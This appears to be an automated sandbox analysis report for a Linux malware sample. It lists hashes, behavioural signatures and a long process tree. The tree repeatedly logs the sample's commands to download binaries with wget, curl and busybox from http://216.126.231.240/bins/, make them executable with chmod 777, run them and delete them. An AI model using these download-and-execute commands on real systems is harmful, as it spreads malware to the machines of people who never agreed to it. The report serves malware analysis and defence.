Analysis
-
max time kernel
26s -
max time network
117s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
09-11-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsel-20240729-en
General
-
Target
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
-
Size
10KB
-
MD5
8024f690eb7cff058a13d1d38f0b31c0
-
SHA1
c4be3a2eb04473145808dd1ce797dce7815d06dc
-
SHA256
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
-
SHA512
9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
-
SSDEEP
192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N1⤵PID:1493
-
/bin/rm/bin/rm bins.sh2⤵PID:1494
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1495
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Writes file to tmp directory
PID:1499 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1500
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:1501 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:1502 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1503
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1504
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Writes file to tmp directory
PID:1505 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1506
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:1507 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:1508 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1509
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1510
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Writes file to tmp directory
PID:1511 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1512
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:1513 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:1514 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1515
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1516
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Writes file to tmp directory
PID:1517 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1518
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:1519 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:1520 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1521
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1522
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Writes file to tmp directory
PID:1523 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1524
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:1525 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:1526 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1527
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1528
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Writes file to tmp directory
PID:1529 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1530
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:1531 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:1532 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1533
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1534
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Writes file to tmp directory
PID:1535 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1536
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:1537 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:1538 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1539
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1540
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Writes file to tmp directory
PID:1541 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1542
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:1543 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:1544 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1545
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1546
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Writes file to tmp directory
PID:1547 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1548
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:1549 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:1550 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1551
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1552
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Writes file to tmp directory
PID:1553 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1554
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:1555 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:1556 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1557
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1558
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Writes file to tmp directory
PID:1559 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1560
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:1561 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:1562 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1563
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1564
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Writes file to tmp directory
PID:1565 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1566
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:1567 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:1568 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1569
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1570
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Writes file to tmp directory
PID:1571 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1572
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:1573 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:1574 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1575
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1576
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Writes file to tmp directory
PID:1577 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1578
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:1579 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:1580 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1581
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1582
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Writes file to tmp directory
PID:1583 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1584
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:1585 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:1586 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1587
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1588
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Writes file to tmp directory
PID:1589 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1590
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:1591 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:1592 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1593
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1594
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Writes file to tmp directory
PID:1595 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1596
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:1597 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:1598 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1599
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1600
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Writes file to tmp directory
PID:1601 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1602
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:1603 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:1604 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1605
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1606
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Writes file to tmp directory
PID:1607 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1608
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:1609 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:1610 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1611
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1612
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Writes file to tmp directory
PID:1613 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1614
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:1615 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:1616 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1617
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1618
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Writes file to tmp directory
PID:1619 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1620
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:1621 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:1622 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1623
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1624
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Writes file to tmp directory
PID:1625 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1626
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:1627 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:1628 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1629
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1630
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Writes file to tmp directory
PID:1631 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1632
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:1633 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:1634 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1635
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1636
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Writes file to tmp directory
PID:1637 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1638
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:1639 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:1640 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1641
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1642
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Writes file to tmp directory
PID:1643 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1644
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:1645 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:1646 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1647
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1648
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Writes file to tmp directory
PID:1649 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1650
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:1651 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:1652 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1653
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1654
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Writes file to tmp directory
PID:1655 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1656
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:1657 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:1658 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1659
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1660
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Writes file to tmp directory
PID:1661 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1662
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:1663 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:1664 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1665
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97